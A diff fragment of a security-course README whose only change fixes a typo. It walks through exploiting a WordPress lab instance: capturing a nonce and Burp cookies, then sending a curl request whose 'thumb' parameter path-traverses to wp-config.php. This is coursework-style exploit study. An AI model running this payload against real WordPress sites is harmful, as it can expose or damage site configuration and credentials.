ArtemSkit/CSCI4349_Week7/README.md

      - Click on "Edit more details"
      - In the HTML source find a hidden input with an id "_wpnonce" and copy it's value
      - Paste the value in place of \*\*\* characters ```curl -v 'http://192.168.33.10/wp-admin/post.php?post=' -H '' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'```
-     - Copy the cookies frome Burp and paste them after -H attribute
+     - Copy the cookies from Burp and paste them after -H attribute
      - Paste the post number in place of \*\*\* characters ```curl -v 'http://192.168.33.10/wp-admin/post.php?post=***' -H '' -d 'action=editattachment&_wpnonce=[value]&thumb=../../../../wp-config.php'```
      - Run the script in terminal.
 Example:
         ```bash